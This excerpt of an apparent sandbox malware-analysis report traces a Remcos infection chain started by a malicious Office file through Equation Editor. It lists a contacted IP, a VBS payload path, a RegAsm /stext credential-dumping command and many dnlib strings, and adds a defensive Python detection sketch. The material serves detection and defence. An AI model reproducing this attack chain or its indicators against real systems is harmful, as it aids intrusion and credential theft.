                  Source: Yara match, File source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 198.12.81.228 Port: 80
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Windows\SysWOW64\wscript.exe
                  Source: ~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp.3.dr, Stream path '_1786367723/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: ~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp.3.dr, Stream path '_1786367727/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
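The Sigma records earlier in this section and the Exploits lines just above reduce to a short chain: WINWORD.EXE loads Equation Editor, EQNEDT32.EXE makes an outbound HTTP connection to 198.12.81.228 and starts wscript.exe, Excel starts the same .vBS, RegAsm.exe spawns a second RegAsm.exe with /stext, and the payload writes its settings under HKEY_CURRENT_USER\Software\Rmc-4CT19T, the key name matching the "Mutex" value in the extracted Remcos configuration. The Python below is a detection sketch added for this page, not the report's logic or any vendor's rule: it replays those facts as constructed event records (paths, ports, IP addresses and the registry key are the report's; the record layout is neither Sysmon's nor Joe Sandbox's) and applies the checks the matched rules imply. WINWORD starting EQNEDT32 is deliberately not flagged on its own, because documents with legitimate Equation 3.0 objects do the same; what fires is Equation Editor spawning a child or reaching the network. Generalising the single Rmc-4CT19T key to any Rmc-<id> key is an assumption.

```python
"""
Detection sketch added for this page (editor-written; not from the Joe
Sandbox report). Replays the process, network and registry facts the report
recorded as simplified event dicts and applies the checks the matched Sigma
rules imply.
"""
import ntpath
import re
from collections import Counter

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe"}
EQNEDT32 = "eqnedt32.exe"
# The report shows the Remcos settings key HKCU\Software\Rmc-4CT19T; matching
# any Rmc-<id> key under Software is an assumption, not something the report states.
REMCOS_KEY = re.compile(r"\\software\\rmc-[a-z0-9]+\\", re.IGNORECASE)

# Image paths as they appear in the report.
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WSCRIPT = r"C:\Windows\SysWOW64\wscript.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
VBS = r"C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS"

# Constructed events: the values come from the report, the record layout is
# this example's own. The last two are benign controls that must not fire.
EVENTS = [
    {"type": "process", "parent": EXCEL, "image": WSCRIPT, "cmd": f'"{WSCRIPT}" "{VBS}"'},
    {"type": "process", "parent": WINWORD, "image": EQN, "cmd": f'"{EQN}" -Embedding'},
    {"type": "process", "parent": EQN, "image": WSCRIPT, "cmd": f'"{WSCRIPT}" "{VBS}"'},
    {"type": "process", "parent": REGASM, "image": REGASM,
     "cmd": f'{REGASM} /stext "C:\\Users\\user\\AppData\\Local\\Temp\\bxivncg"'},
    {"type": "network", "image": EQN, "dst_ip": "198.12.81.228", "dst_port": 80},
    {"type": "network", "image": EXCEL, "dst_ip": "88.99.66.38", "dst_port": 443},
    {"type": "registry", "image": REGASM, "key": r"HKEY_CURRENT_USER\Software\Rmc-4CT19T\exepath"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": EXCEL, "cmd": f'"{EXCEL}"'},
    {"type": "registry", "image": EXCEL, "key": r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options"},
]


def _name(path):
    return ntpath.basename(path).lower()


def evaluate(events):
    """Return (rule, image basename) for every event that matches a check."""
    hits = []
    for ev in events:
        img = _name(ev["image"])
        if ev["type"] == "process":
            parent = _name(ev["parent"])
            if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
                hits.append(("office_spawns_script_host", img))
            if parent == EQNEDT32:
                # Equation Editor has no legitimate reason to start a child;
                # any child is the post-exploitation step of the Equation
                # Editor bugs (CVE-2017-11882 / CVE-2018-0802).
                hits.append(("eqnedt32_starts_process", img))
            if parent == "regasm.exe" and img == "regasm.exe" and "/stext" in ev["cmd"].lower():
                hits.append(("regasm_stext_self_spawn", img))
        elif ev["type"] == "network":
            if img == EQNEDT32:
                hits.append(("eqnedt32_network_connect", img))
            elif img in OFFICE_APPS:
                hits.append(("office_network_connect", img))
        elif ev["type"] == "registry":
            if REMCOS_KEY.search(ev["key"]):
                hits.append(("remcos_config_key", img))
    return hits


def summarize(events):
    """Rule name -> number of matching events."""
    return dict(Counter(rule for rule, _ in evaluate(events)))


if __name__ == "__main__":
    for rule, image in evaluate(EVENTS):
        print(f"{rule:28} {image}")
    print(summarize(EVENTS))
```

Each of the six malicious records trips exactly one check and the two controls trip none. In a real pipeline the same predicates would sit on Sysmon event IDs 1, 3 and 13 (the EventID values the Sigma records above carry), with the Office and script-host sets widened to the binaries present in the estate.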

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 14_2_00407538 _wcslen,CoGetObject, 14_2_00407538
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
